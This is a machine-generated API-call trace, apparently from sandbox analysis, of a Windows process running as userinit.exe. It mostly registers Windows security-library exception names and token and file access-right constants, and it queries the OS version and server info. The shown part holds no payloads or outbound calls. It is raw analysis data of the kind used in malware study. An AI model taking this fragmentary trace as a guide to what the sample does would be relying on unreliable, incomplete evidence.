[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f528*=0x0, psz="EJwsclResourceInitFailed", len=0x18 | out: pbstr=0x2a1f528*="EJwsclResourceInitFailed") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f510*=0x0, psz="EJwsclResourceUnequalCount", len=0x1a | out: pbstr=0x2a1f510*="EJwsclResourceUnequalCount") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f4f8*=0x0, psz="EJwsclResourceNotFound", len=0x16 | out: pbstr=0x2a1f4f8*="EJwsclResourceNotFound") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f4e0*=0x0, psz="EJwsclResourceException", len=0x17 | out: pbstr=0x2a1f4e0*="EJwsclResourceException") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f4c8*=0x0, psz="EJwsclFailedAddACE", len=0x12 | out: pbstr=0x2a1f4c8*="EJwsclFailedAddACE") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f4b0*=0x0, psz="EJwsclUnsupportedACE", len=0x14 | out: pbstr=0x2a1f4b0*="EJwsclUnsupportedACE") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f498*=0x0, psz="EJwsclOpenWindowStationException", len=0x20 | out: pbstr=0x2a1f498*="EJwsclOpenWindowStationException") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f480*=0x0, psz="EJwsclWindowStationException", len=0x1c | out: pbstr=0x2a1f480*="EJwsclWindowStationException") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f468*=0x0, psz="EJwsclCloseDesktopException", len=0x1b | out: pbstr=0x2a1f468*="EJwsclCloseDesktopException") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f450*=0x0, psz="EJwsclCreateDesktopException", len=0x1c | out: pbstr=0x2a1f450*="EJwsclCreateDesktopException") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f438*=0x0, psz="EJwsclOpenDesktopException", len=0x1a | out: pbstr=0x2a1f438*="EJwsclOpenDesktopException") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f420*=0x0, psz="EJwsclDesktopException", len=0x16 | out: pbstr=0x2a1f420*="EJwsclDesktopException") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f408*=0x0, psz="EJwsclSACLAccessDenied", len=0x16 | out: pbstr=0x2a1f408*="EJwsclSACLAccessDenied") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f3f0*=0x0, psz="EJwsclAccessDenied", len=0x12 | out: pbstr=0x2a1f3f0*="EJwsclAccessDenied") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f3d8*=0x0, psz="EJwsclLSAException", len=0x12 | out: pbstr=0x2a1f3d8*="EJwsclLSAException") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f3c0*=0x0, psz="ESetOwnerException", len=0x12 | out: pbstr=0x2a1f3c0*="ESetOwnerException") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f3a8*=0x0, psz="ESetSecurityException", len=0x15 | out: pbstr=0x2a1f3a8*="ESetSecurityException") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f390*=0x0, psz="EJwsclInvalidParentDescriptor", len=0x1d | out: pbstr=0x2a1f390*="EJwsclInvalidParentDescriptor") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f378*=0x0, psz="EJwsclInvalidKeyPath", len=0x14 | out: pbstr=0x2a1f378*="EJwsclInvalidKeyPath") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f360*=0x0, psz="EJwsclInvalidGenericAccessMask", len=0x1e | out: pbstr=0x2a1f360*="EJwsclInvalidGenericAccessMask") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f348*=0x0, psz="EJwsclAdaptSecurityInfoException", len=0x20 | out: pbstr=0x2a1f348*="EJwsclAdaptSecurityInfoException") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f330*=0x0, psz="EJwsclThreadException", len=0x15 | out: pbstr=0x2a1f330*="EJwsclThreadException") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f318*=0x0, psz="EJwsclInvalidObjectException", len=0x1c | out: pbstr=0x2a1f318*="EJwsclInvalidObjectException") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f300*=0x0, psz="EJwsclSecurityObjectException", len=0x1d | out: pbstr=0x2a1f300*="EJwsclSecurityObjectException") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f2e8*=0x0, psz="EJwsclHashMismatch", len=0x12 | out: pbstr=0x2a1f2e8*="EJwsclHashMismatch") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f2d0*=0x0, psz="EJwsclStreamHashException", len=0x19 | out: pbstr=0x2a1f2d0*="EJwsclStreamHashException") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f2b8*=0x0, psz="EJwsclStreamInvalidMagicException", len=0x21 | out: pbstr=0x2a1f2b8*="EJwsclStreamInvalidMagicException") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f2a0*=0x0, psz="EJwsclStreamSizeException", len=0x19 | out: pbstr=0x2a1f2a0*="EJwsclStreamSizeException") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f288*=0x0, psz="EJwsclStreamException", len=0x15 | out: pbstr=0x2a1f288*="EJwsclStreamException") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f270*=0x0, psz="EJwsclNoSuchLogonSession", len=0x18 | out: pbstr=0x2a1f270*="EJwsclNoSuchLogonSession") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f258*=0x0, psz="EJwsclInvalidFlagsException", len=0x1b | out: pbstr=0x2a1f258*="EJwsclInvalidFlagsException") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f240*=0x0, psz="EJwsclProcessNotFound", len=0x15 | out: pbstr=0x2a1f240*="EJwsclProcessNotFound") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f228*=0x0, psz="EJwsclInvalidParameterException", len=0x1f | out: pbstr=0x2a1f228*="EJwsclInvalidParameterException") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f210*=0x0, psz="EJwsclInvalidPathException", len=0x1a | out: pbstr=0x2a1f210*="EJwsclInvalidPathException") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f1f8*=0x0, psz="EJwsclInvalidSecurityDescriptor", len=0x1f | out: pbstr=0x2a1f1f8*="EJwsclInvalidSecurityDescriptor") returned 1
[0201.136] SysReAllocStringLen (in: pbstr=0x2a1f1e0*=0x0, psz="EJwsclInvalidRevision", len=0x15 | out: pbstr=0x2a1f1e0*="EJwsclInvalidRevision") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1f1c8*=0x0, psz="EJwsclInvalidAceMismatch", len=0x18 | out: pbstr=0x2a1f1c8*="EJwsclInvalidAceMismatch") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1f1b0*=0x0, psz="EJwsclRevisionMismatchException", len=0x1f | out: pbstr=0x2a1f1b0*="EJwsclRevisionMismatchException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1f198*=0x0, psz="EJwsclInvalidACEException", len=0x19 | out: pbstr=0x2a1f198*="EJwsclInvalidACEException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1f180*=0x0, psz="EJwsclReadOnlyPropertyException", len=0x1f | out: pbstr=0x2a1f180*="EJwsclReadOnlyPropertyException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1f168*=0x0, psz="EJwsclDuplicateListEntryException", len=0x21 | out: pbstr=0x2a1f168*="EJwsclDuplicateListEntryException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1f150*=0x0, psz="EJwsclIndexOutOfBoundsException", len=0x1f | out: pbstr=0x2a1f150*="EJwsclIndexOutOfBoundsException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1f138*=0x0, psz="EJwsclInvalidSidAuthorityValue", len=0x1e | out: pbstr=0x2a1f138*="EJwsclInvalidSidAuthorityValue") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1f120*=0x0, psz="EJwsclInvalidKnownSIDException", len=0x1e | out: pbstr=0x2a1f120*="EJwsclInvalidKnownSIDException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1f108*=0x0, psz="EJwsclInvalidComputer", len=0x15 | out: pbstr=0x2a1f108*="EJwsclInvalidComputer") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1f0f0*=0x0, psz="EJwsclInvalidGroupSIDException", len=0x1e | out: pbstr=0x2a1f0f0*="EJwsclInvalidGroupSIDException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1f0d8*=0x0, psz="EJwsclInvalidOwnerSIDException", len=0x1e | out: pbstr=0x2a1f0d8*="EJwsclInvalidOwnerSIDException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1f0c0*=0x0, psz="EJwsclInvalidSIDException", len=0x19 | out: pbstr=0x2a1f0c0*="EJwsclInvalidSIDException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1f0a8*=0x0, psz="EJwsclInvalidSecurityListException", len=0x22 | out: pbstr=0x2a1f0a8*="EJwsclInvalidSecurityListException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1f090*=0x0, psz="EJwsclInvalidMandatoryLevelException", len=0x24 | out: pbstr=0x2a1f090*="EJwsclInvalidMandatoryLevelException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1f078*=0x0, psz="EJwsclEmptyACLException", len=0x17 | out: pbstr=0x2a1f078*="EJwsclEmptyACLException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1f060*=0x0, psz="EJwsclNILParameterException", len=0x1b | out: pbstr=0x2a1f060*="EJwsclNILParameterException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1f048*=0x0, psz="EJwsclInheritanceSourceNotSupportedException", len=0x2c | out: pbstr=0x2a1f048*="EJwsclInheritanceSourceNotSupportedException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1f030*=0x0, psz="EJwsclInvalidObjectArrayException", len=0x21 | out: pbstr=0x2a1f030*="EJwsclInvalidObjectArrayException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1f018*=0x0, psz="EJwsclProcessIdNotAvailable", len=0x1b | out: pbstr=0x2a1f018*="EJwsclProcessIdNotAvailable") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1f000*=0x0, psz="EJwsclWinCallFailedException", len=0x1c | out: pbstr=0x2a1f000*="EJwsclWinCallFailedException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1efe8*=0x0, psz="EJwsclUnsupportedWindowsVersionException", len=0x28 | out: pbstr=0x2a1efe8*="EJwsclUnsupportedWindowsVersionException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1efd0*=0x0, psz="EJwsclNotImplementedException", len=0x1d | out: pbstr=0x2a1efd0*="EJwsclNotImplementedException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1efb8*=0x0, psz="EJwsclAccessTypeException", len=0x19 | out: pbstr=0x2a1efb8*="EJwsclAccessTypeException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1efa0*=0x0, psz="EJwsclAdjustPrivilegeException", len=0x1e | out: pbstr=0x2a1efa0*="EJwsclAdjustPrivilegeException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1ef88*=0x0, psz="EJwsclPrivilegeCheckException", len=0x1d | out: pbstr=0x2a1ef88*="EJwsclPrivilegeCheckException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1ef70*=0x0, psz="EJwsclPrivilegeNotFoundException", len=0x20 | out: pbstr=0x2a1ef70*="EJwsclPrivilegeNotFoundException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1ef58*=0x0, psz="EJwsclInvalidIndexPrivilegeException", len=0x24 | out: pbstr=0x2a1ef58*="EJwsclInvalidIndexPrivilegeException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1ef40*=0x0, psz="EJwsclPrivilegeException", len=0x18 | out: pbstr=0x2a1ef40*="EJwsclPrivilegeException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1ef28*=0x0, psz="EJwsclNotEnoughMemory", len=0x15 | out: pbstr=0x2a1ef28*="EJwsclNotEnoughMemory") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1ef10*=0x0, psz="EJwsclInvalidTokenHandle", len=0x18 | out: pbstr=0x2a1ef10*="EJwsclInvalidTokenHandle") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1eef8*=0x0, psz="EJwsclNoThreadTokenAvailable", len=0x1c | out: pbstr=0x2a1eef8*="EJwsclNoThreadTokenAvailable") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1eee0*=0x0, psz="EJwsclDuplicateTokenException", len=0x1d | out: pbstr=0x2a1eee0*="EJwsclDuplicateTokenException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1eec8*=0x0, psz="EJwsclInvalidOwnerException", len=0x1b | out: pbstr=0x2a1eec8*="EJwsclInvalidOwnerException") returned 1
[0201.137] SysReAllocStringLen (in: pbstr=0x2a1eeb0*=0x0, psz="EJwsclInvalidPrimaryToken", len=0x19 | out: pbstr=0x2a1eeb0*="EJwsclInvalidPrimaryToken") returned 1
[0201.138] SysReAllocStringLen (in: pbstr=0x2a1ee98*=0x0, psz="EJwsclTokenPrimaryException", len=0x1b | out: pbstr=0x2a1ee98*="EJwsclTokenPrimaryException") returned 1
[0201.138] SysReAllocStringLen (in: pbstr=0x2a1ee80*=0x0, psz="EJwsclTokenImpersonationException", len=0x21 | out: pbstr=0x2a1ee80*="EJwsclTokenImpersonationException") returned 1
[0201.138] SysReAllocStringLen (in: pbstr=0x2a1ee68*=0x0, psz="EJwsclTokenInformationException", len=0x1f | out: pbstr=0x2a1ee68*="EJwsclTokenInformationException") returned 1
[0201.138] SysReAllocStringLen (in: pbstr=0x2a1ee50*=0x0, psz="EJwsclSharedTokenException", len=0x1a | out: pbstr=0x2a1ee50*="EJwsclSharedTokenException") returned 1
[0201.138] SysReAllocStringLen (in: pbstr=0x2a1ee38*=0x0, psz="EJwsclOpenProcessTokenException", len=0x1f | out: pbstr=0x2a1ee38*="EJwsclOpenProcessTokenException") returned 1
[0201.138] SysReAllocStringLen (in: pbstr=0x2a1ee20*=0x0, psz="EJwsclOpenThreadTokenException", len=0x1e | out: pbstr=0x2a1ee20*="EJwsclOpenThreadTokenException") returned 1
[0201.138] SysReAllocStringLen (in: pbstr=0x2a1ee08*=0x0, psz="EJwsclSecurityException", len=0x17 | out: pbstr=0x2a1ee08*="EJwsclSecurityException") returned 1
[0201.138] SysReAllocStringLen (in: pbstr=0x2a1edf0*=0x0, psz="Exception", len=0x9 | out: pbstr=0x2a1edf0*="Exception") returned 1
[0201.138] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0201.138] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0201.138] GetVersionExA (in: lpVersionInformation=0x22f384*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x76a6ea43, dwMinorVersion=0x80000, dwBuildNumber=0x0, dwPlatformId=0x10, szCSDVersion="\xac\xf3\x22") | out: lpVersionInformation=0x22f384*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0201.138] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x0
[0201.138] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x73b10000
[0201.194] GetProcAddress (hModule=0x73b10000, lpProcName="NetServerGetInfo") returned 0x74f13cfa
[0201.195] NetServerGetInfo (in: servername="", level=0x65, bufptr=0x22f408 | out: bufptr=0x22f408) returned 0x0
[0201.252] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x73b10000
[0201.252] GetProcAddress (hModule=0x73b10000, lpProcName="NetApiBufferFree") returned 0x73b013d2
[0201.252] NetApiBufferFree (Buffer=0xa1d00) returned 0x0
[0201.252] SetErrorMode (uMode=0x8000) returned 0x1
[0201.252] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x758f0000
[0201.252] SetErrorMode (uMode=0x1) returned 0x8000
[0201.252] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0201.254] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0201.255] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0201.257] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0201.258] SysReAllocStringLen (in: pbstr=0x2a1ec40*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a1ec40*="DELETE") returned 1
[0201.258] SysReAllocStringLen (in: pbstr=0x2a1ec30*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a1ec30*="READ_CONTROL") returned 1
[0201.258] SysReAllocStringLen (in: pbstr=0x2a1ec20*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a1ec20*="WRITE_OWNER") returned 1
[0201.258] SysReAllocStringLen (in: pbstr=0x2a1ec10*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a1ec10*="WRITE_DAC") returned 1
[0201.258] SysReAllocStringLen (in: pbstr=0x2a1ec00*=0x0, psz="FILE_WRITE_ATTRIBUTES", len=0x15 | out: pbstr=0x2a1ec00*="FILE_WRITE_ATTRIBUTES") returned 1
[0201.258] SysReAllocStringLen (in: pbstr=0x2a1ebf0*=0x0, psz="FILE_READ_ATTRIBUTES", len=0x14 | out: pbstr=0x2a1ebf0*="FILE_READ_ATTRIBUTES") returned 1
[0201.258] SysReAllocStringLen (in: pbstr=0x2a1ebe0*=0x0, psz="FILE_CREATE_PIPE_INSTANCE", len=0x19 | out: pbstr=0x2a1ebe0*="FILE_CREATE_PIPE_INSTANCE") returned 1
[0201.258] SysReAllocStringLen (in: pbstr=0x2a1ebd0*=0x0, psz="FILE_WRITE_DATA", len=0xf | out: pbstr=0x2a1ebd0*="FILE_WRITE_DATA") returned 1
[0201.258] SysReAllocStringLen (in: pbstr=0x2a1ebc0*=0x0, psz="FILE_READ_DATA", len=0xe | out: pbstr=0x2a1ebc0*="FILE_READ_DATA") returned 1
[0201.258] SysReAllocStringLen (in: pbstr=0x2a1ebb0*=0x0, psz="FILE_ALL_ACCESS", len=0xf | out: pbstr=0x2a1ebb0*="FILE_ALL_ACCESS") returned 1
[0201.258] SysReAllocStringLen (in: pbstr=0x2a1eba0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a1eba0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0201.258] SysReAllocStringLen (in: pbstr=0x2a1eb90*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a1eb90*="STANDARD_RIGHTS_WRITE") returned 1
[0201.258] SysReAllocStringLen (in: pbstr=0x2a1eb80*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a1eb80*="STANDARD_RIGHTS_READ") returned 1
[0201.258] SysReAllocStringLen (in: pbstr=0x2a1eb70*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a1eb70*="STANDARD_RIGHTS_ALL") returned 1
[0201.258] SysReAllocStringLen (in: pbstr=0x2a1eb50*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a1eb50*="DELETE") returned 1
[0201.258] SysReAllocStringLen (in: pbstr=0x2a1eb40*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a1eb40*="READ_CONTROL") returned 1
[0201.258] SysReAllocStringLen (in: pbstr=0x2a1eb30*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a1eb30*="WRITE_OWNER") returned 1
[0201.258] SysReAllocStringLen (in: pbstr=0x2a1eb20*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a1eb20*="WRITE_DAC") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1eb10*=0x0, psz="TOKEN_ADJUST_SESSIONID", len=0x16 | out: pbstr=0x2a1eb10*="TOKEN_ADJUST_SESSIONID") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1eb00*=0x0, psz="TOKEN_ADJUST_DEFAULT", len=0x14 | out: pbstr=0x2a1eb00*="TOKEN_ADJUST_DEFAULT") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1eaf0*=0x0, psz="TOKEN_ADJUST_GROUPS", len=0x13 | out: pbstr=0x2a1eaf0*="TOKEN_ADJUST_GROUPS") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1eae0*=0x0, psz="TOKEN_ADJUST_PRIVILEGES", len=0x17 | out: pbstr=0x2a1eae0*="TOKEN_ADJUST_PRIVILEGES") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1ead0*=0x0, psz="TOKEN_QUERY_SOURCE", len=0x12 | out: pbstr=0x2a1ead0*="TOKEN_QUERY_SOURCE") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1eac0*=0x0, psz="TOKEN_QUERY", len=0xb | out: pbstr=0x2a1eac0*="TOKEN_QUERY") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1eab0*=0x0, psz="TOKEN_IMPERSONATE", len=0x11 | out: pbstr=0x2a1eab0*="TOKEN_IMPERSONATE") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1eaa0*=0x0, psz="TOKEN_DUPLICATE", len=0xf | out: pbstr=0x2a1eaa0*="TOKEN_DUPLICATE") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1ea90*=0x0, psz="TOKEN_ASSIGN_PRIMARY", len=0x14 | out: pbstr=0x2a1ea90*="TOKEN_ASSIGN_PRIMARY") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1ea80*=0x0, psz="TOKEN_ALL_ACCESS", len=0x10 | out: pbstr=0x2a1ea80*="TOKEN_ALL_ACCESS") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1ea70*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a1ea70*="STANDARD_RIGHTS_EXECUTE") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1ea60*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a1ea60*="STANDARD_RIGHTS_WRITE") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1ea50*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a1ea50*="STANDARD_RIGHTS_READ") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1ea40*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a1ea40*="STANDARD_RIGHTS_ALL") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1ea30*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a1ea30*="DELETE") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1ea20*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a1ea20*="READ_CONTROL") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1ea10*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a1ea10*="WRITE_OWNER") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1ea00*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a1ea00*="WRITE_DAC") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1e9f0*=0x0, psz="TIMER_MODIFY_STATE", len=0x12 | out: pbstr=0x2a1e9f0*="TIMER_MODIFY_STATE") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1e9e0*=0x0, psz="TIMER_QUERY_STATE", len=0x11 | out: pbstr=0x2a1e9e0*="TIMER_QUERY_STATE") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1e9d0*=0x0, psz="TIMER_ALL_ACCESS", len=0x10 | out: pbstr=0x2a1e9d0*="TIMER_ALL_ACCESS") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1e9c0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a1e9c0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1e9b0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a1e9b0*="STANDARD_RIGHTS_WRITE") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1e9a0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a1e9a0*="STANDARD_RIGHTS_READ") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1e990*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a1e990*="STANDARD_RIGHTS_ALL") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1e980*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a1e980*="DELETE") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1e970*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a1e970*="READ_CONTROL") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1e960*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a1e960*="WRITE_OWNER") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1e950*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a1e950*="WRITE_DAC") returned 1
[0201.259] SysReAllocStringLen (in: pbstr=0x2a1e940*=0x0, psz="SECTION_EXTEND_SIZE", len=0x13 | out: pbstr=0x2a1e940*="SECTION_EXTEND_SIZE") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e930*=0x0, psz="FILE_MAP_READ", len=0xd | out: pbstr=0x2a1e930*="FILE_MAP_READ") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e920*=0x0, psz="FILE_MAP_WRITE", len=0xe | out: pbstr=0x2a1e920*="FILE_MAP_WRITE") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e910*=0x0, psz="FILE_MAP_COPY", len=0xd | out: pbstr=0x2a1e910*="FILE_MAP_COPY") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e900*=0x0, psz="FILE_MAP_ALL_ACCESS", len=0x13 | out: pbstr=0x2a1e900*="FILE_MAP_ALL_ACCESS") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e8f0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a1e8f0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e8e0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a1e8e0*="STANDARD_RIGHTS_WRITE") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e8d0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a1e8d0*="STANDARD_RIGHTS_READ") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e8c0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a1e8c0*="STANDARD_RIGHTS_ALL") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e8b0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a1e8b0*="DELETE") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e8a0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a1e8a0*="READ_CONTROL") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e890*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a1e890*="WRITE_OWNER") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e880*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a1e880*="WRITE_DAC") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e870*=0x0, psz="MUTEX_MODIFY_STATE", len=0x12 | out: pbstr=0x2a1e870*="MUTEX_MODIFY_STATE") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e860*=0x0, psz="MUTEX_ALL_ACCESS", len=0x10 | out: pbstr=0x2a1e860*="MUTEX_ALL_ACCESS") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e850*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a1e850*="STANDARD_RIGHTS_EXECUTE") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e840*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a1e840*="STANDARD_RIGHTS_WRITE") returned 1
[0201.260] SysReAllocStringLen (in: pbstr=0x2a1e830*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a1e830*="STANDARD_RIGHTS_READ") returned 1
